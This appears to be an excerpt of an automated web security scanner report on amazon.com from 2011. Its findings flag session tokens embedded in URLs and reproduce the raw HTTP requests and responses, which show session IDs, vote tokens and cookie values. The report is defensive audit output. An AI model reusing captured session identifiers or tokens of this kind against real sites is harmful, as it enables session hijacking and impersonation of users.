  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8AF62AB7ACDE502E7743675297CFF93F69261AA8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2A7F22C631B7AE7AAF20BE088CD2B5B7F134EAF8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5683F405FDA36D090ADA5C068BA632D753C9B956&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=289D038174E6CCD7D1CAB37A1971DD13AA4DF479&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=B855AC71E5AAEFD49D2AA2649EC24D94F71DFA4B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=A750D83A7128E87EC09BE45B4A6F0FFBF827F98F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2FACFA3FF652901070EB07168901A6C2E350FCA0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AD8DC967E92B545AA8AF75FD1A346CD19C31E1AF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0EACC5A3790CED813CC9E6FB1B5FC1270926CA78&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225

Request

GET /Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:34 GMT
Server: Server
x-amz-id-1: 1X3EPAT3ZMNVCSGSMBAN
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XWFESHf4LDfW4Q4jtyPNlMZUcPixPfxkYZBCrWieQtkwWSKt/X54SoeJ/bATZoKW
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-6920967-0553225; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 508145


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_xlApnb13PTZNC?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_fa_dp_xlApnb13PTZNC%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by%2520Amazon" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_xlApnb13PTZNC?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_fa_dp_xlApnb13PTZNC%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by%2520Amazon', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_xlApnb13PTZNC?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0015T963C%252Fx22%252Fref%253Dcm_sw_r_tw_dp_xlApnb13PTZNC%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_tw_dp_xlApnb13PTZNC%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_xlApnb13PTZNC?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0015T963C%252Fx22%252Fref%253Dcm_sw_r_tw_dp_xlApnb13PTZNC%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_tw_dp_xlApnb13PTZNC%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=B855AC71E5AAEFD49D2AA2649EC24D94F71DFA4B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=289D038174E6CCD7D1CAB37A1971DD13AA4DF479&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=A750D83A7128E87EC09BE45B4A6F0FFBF827F98F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AD8DC967E92B545AA8AF75FD1A346CD19C31E1AF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2FACFA3FF652901070EB07168901A6C2E350FCA0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0EACC5A3790CED813CC9E6FB1B5FC1270926CA78&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2A7F22C631B7AE7AAF20BE088CD2B5B7F134EAF8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8AF62AB7ACDE502E7743675297CFF93F69261AA8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5683F405FDA36D090ADA5C068BA632D753C9B956&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.69. http://www.amazon.com/b/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /b/

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=pd_lpo_ix_gw_am_us_ca_en/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazon.ca%2Fgp%2Fhomepage.html%3Ftag%3Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846

Request

GET /b/?ie=UTF8&node=507846&tag=amazusnavi-20&ref=pd_sl_24x92mgoc0_b/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:36 GMT
Server: Server
x-amz-id-1: 1RQGNQ6WM7Y4MS66G38B
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: +r+poGKg+6bD50on5oekljcjzy+nvcyzjWwpkxQMpxCaWBoeQj7sCKT1NNVYKm6p
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-7332499-5529366; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 135637


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF
...[SNIP]...
<div class="bannerImage"><a href="/gp/redirect.html/ref=pd_lpo_ix_gw_am_us_ca_en/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazon.ca%2Fgp%2Fhomepage.html%3Ftag%3Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif" align="center" alt="Shop at Amazon.ca" border="0" />
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.70. http://www.amazon.com/dp/0313363153

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0313363153

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_BJTpnb1EQ5KVK?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0313363153%2Fref%3Dcm_sw_r_fa_dp_BJTpnb1EQ5KVK%26bodytext%3DBreaking%2520Free%252C%2520Starting%2520Over%253A%2520Parenting%2520in%2520the%2520Aftermath%2520of%2520Family%2520Violence%2520by%2520Christina%2520M.%2520Dalpiaz
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_BJTpnb1EQ5KVK?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0313363153%252Fref%253Dcm_sw_r_tw_dp_BJTpnb1EQ5KVK%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBreaking%2520Free%252C%2520Starting%2520Over%253A%2520Parenting%2520in%2520the%2520Aftermath%2520of%2520Family%2520Violence%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0313363153%2Fref%3Dcm_sw_r_tw_dp_BJTpnb1EQ5KVK%26count%3Dnone
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FC82A74D1E62C7EA36EE314FA3F6368A848BDBBD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Helpful.Reviews&voteSessionID=188-3368164-3583051
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5150085B47183668122EAFCC27ECE5F23DE669B5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Helpful.Reviews&voteSessionID=188-3368164-3583051
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5B840721150D35FE87BEE378FEECF1DC012D8847&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Inappropriate.Reviews&voteSessionID=188-3368164-3583051

Request

GET /dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0313363153&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:18 GMT
Server: Server
x-amz-id-1: 1XEKQW5VKEVTKXS2HSJA
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XeWIrG239x/NdCZhKVLDJEcUlefLzu6eYfgdzbR7oX4dl76GDeDVLHHKaEiGy4dJ
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT
Content-Length: 369008


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a>
